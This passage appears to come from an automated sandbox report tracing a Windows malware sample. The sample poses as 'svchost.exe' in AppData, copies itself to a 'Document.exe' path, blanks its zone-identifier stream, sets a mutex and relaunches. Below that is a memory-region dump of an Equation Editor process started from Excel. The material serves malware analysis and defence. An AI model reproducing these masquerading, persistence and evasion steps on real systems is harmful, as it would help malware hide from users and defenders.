szExeFile="beef-http-plants.exe")) returned 1 [0165.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hunting garmin marriage.exe")) returned 1 [0165.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portsmouth_sauce_certificates.exe")) returned 1 [0165.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="insights hu.exe")) returned 1 [0165.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x578, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stroke_enough_reporter.exe")) returned 1 [0165.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="por tramadol started.exe")) returned 1 [0165.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="add.exe")) returned 1 [0165.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentinasovietavg.exe")) returned 1 [0165.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x39c, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0165.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0165.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0165.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb50, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0165.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0165.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x18f71c | out: lppe=0x18f71c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x36c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 0 [0165.144] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6f4, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0165.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1f, ProcessInformation=0x18f944, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f944, ReturnLength=0x0) returned 0x0 [0165.144] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x1e, ProcessInformation=0x18f940, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18f940, ReturnLength=0x0) returned 0xc0000353 [0165.144] GetCommandLineW () returned="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" " [0165.144] CallWindowProcW (lpPrevWndFunc=0x3e0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x679400 [0165.144] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" ", pNumArgs=0x18f944 | out: pNumArgs=0x18f944) returned 0x679400*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" [0165.145] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0165.145] FindResourceW (hModule=0x400000, lpName=0x3e8, lpType=0xb) returned 0x47b918 [0165.145] SizeofResource (hModule=0x400000, hResInfo=0x47b918) returned 0x3e9 [0165.145] LoadResource (hModule=0x400000, hResInfo=0x47b918) returned 0x4b29a8 [0165.145] VirtualAlloc (lpAddress=0x0, dwSize=0x3e9, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0165.145] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f1ec, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0165.145] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18f700 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0165.149] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document"), lpSecurityAttributes=0x0) returned 1 [0165.150] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0 [0165.150] CopyFileW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe"), bFailIfExists=0) returned 1 [0165.170] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe")) returned 0x2020 [0165.170] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe:ZoneIdentifier" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\document\\document.exe:zoneidentifier"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc8 [0165.171] SetFilePointer (in: hFile=0xc8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0165.171] WriteFile (in: hFile=0xc8, lpBuffer=0x18efcf*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x18ed88, lpOverlapped=0x0 | out: lpBuffer=0x18efcf*, lpNumberOfBytesWritten=0x18ed88*=0x0, lpOverlapped=0x0) returned 1 [0165.171] CloseHandle (hObject=0xc8) returned 1 [0165.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f6a0, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\svchost.exe")) returned 0x2d [0165.171] CallWindowProcW (lpPrevWndFunc=0x3e0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1159bd3 [0165.171] GetTickCount () returned 0x2f353 [0165.171] wsprintfW (in: param_1=0x18f904, param_2="%X" | out: param_1="1159BD3") returned 7 [0165.171] wsprintfW (in: param_1=0x18f498, param_2="\"%s\" 1 \"%s\" %s" | out: param_1="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3") returned 115 [0165.171] CallWindowProcW (lpPrevWndFunc=0x3e0004, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0xc8 [0165.171] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="1159BD3") returned 0xc8 [0165.171] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f8a8*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f8f4 | out: lpCommandLine="\"C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe\" 1 \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\svchost.exe\" 1159BD3", lpProcessInformation=0x18f8f4*(hProcess=0xd4, hThread=0xd0, dwProcessId=0x818, dwThreadId=0x820)) returned 1 [0165.442] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\DOCUMENT\\Document.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x20, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18f998*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f988 | out: lpCommandLine=0x0, lpProcessInformation=0x18f988*(hProcess=0xd8, hThread=0xdc, dwProcessId=0x81c, dwThreadId=0x600)) returned 1 [0165.488] ExitProcess (uExitCode=0x0) Process: id = "5" image_name = "eqnedt32.exe" filename = "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x75732000" os_pid = "0xbd8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x8fc" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 975 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 976 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 977 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 978 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 979 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 980 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 981 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 982 start_va = 0x400000 end_va = 0x48dfff entry_point = 0x400000 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 983 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 984 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 985 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 986 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 987 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 988 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 989 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 990 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 991 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 992 start_va = 0x1c0000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 993 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 994 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 995 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 996 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 997 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 998 start_va = 0x350000 end_va = 0x3b6fff entry_point = 0x350000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 999 start_va = 0x74ff0000 end_va = 0x751a7fff entry_point = 0x74ff0000 region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1000 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1001 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1002 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1003 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1004 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1005 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1006 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1007 start_va = 0x756d0000 end_va = 0x75848fff entry_point = 0x756d0000 region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 1008 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1009 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1010 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1011 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1012 start_va = 0x75c60000 end_va = 0x75cb6fff entry_point = 0x75c60000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1013 start_va = 0x75cf0000 end_va = 0x75e4bfff entry_point = 0x75cf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1014 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1015 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1016 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1017 start_va = 0x76720000 end_va = 0x767aefff entry_point = 0x76720000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1018 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1019 start_va = 0x76b00000 end_va = 0x77749fff entry_point = 0x76b00000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1020 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1021 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1022 start_va = 0x756a0000 end_va = 0x756aafff entry_point = 0x756a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1023 start_va = 0x756b0000 end_va = 0x756c6fff entry_point = 0x756b0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1024 start_va = 0x75460000 end_va = 0x754e3fff entry_point = 0x75460000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1025 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1026 start_va = 0x490000 end_va = 0x617fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1027 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1028 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1029 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1030 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1031 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 1032 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 1033 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1034 start_va = 0x620000 end_va = 0x7a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1035 start_va = 0x7b0000 end_va = 0x1baffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1036 start_va = 0x1bb0000 end_va = 0x1e7efff entry_point = 0x1bb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1037 start_va = 0x1e80000 end_va = 0x2272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 1038 start_va = 0x6fe20000 end_va = 0x6fe2ffff entry_point = 0x0 region_type = private name = "private_0x000000006fe20000" filename = "" Region: id = 1039 start_va = 0x75290000 end_va = 0x75292fff entry_point = 0x75290000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1040 start_va = 0x2380000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 1041 start_va = 0x2390000 end_va = 0x239ffff entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 1042 start_va = 0x23a0000 end_va = 0x279ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 1043 start_va = 0x74960000 end_va = 0x74b9ffff entry_point = 0x74960000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 1044 start_va = 0x22e0000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1045 start_va = 0x3de20000 end_va = 0x3de2dfff entry_point = 0x3de20000 region_type = mapped_file name = "eeintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\equation\\1033\\eeintl.dll") Region: id = 1046 start_va = 0x75210000 end_va = 0x7528ffff entry_point = 0x75210000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1047 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1048 start_va = 0x27a0000 end_va = 0x287efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 1049 start_va = 0x76040000 end_va = 0x760c2fff entry_point = 0x76040000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1050 start_va = 0x2280000 end_va = 0x22bffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1051 start_va = 0x2320000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 1052 start_va = 0x2880000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 1053 start_va = 0x2980000 end_va = 0x2a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 1054 start_va = 0x75680000 end_va = 0x75695fff entry_point = 0x75680000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1055 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1056 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = 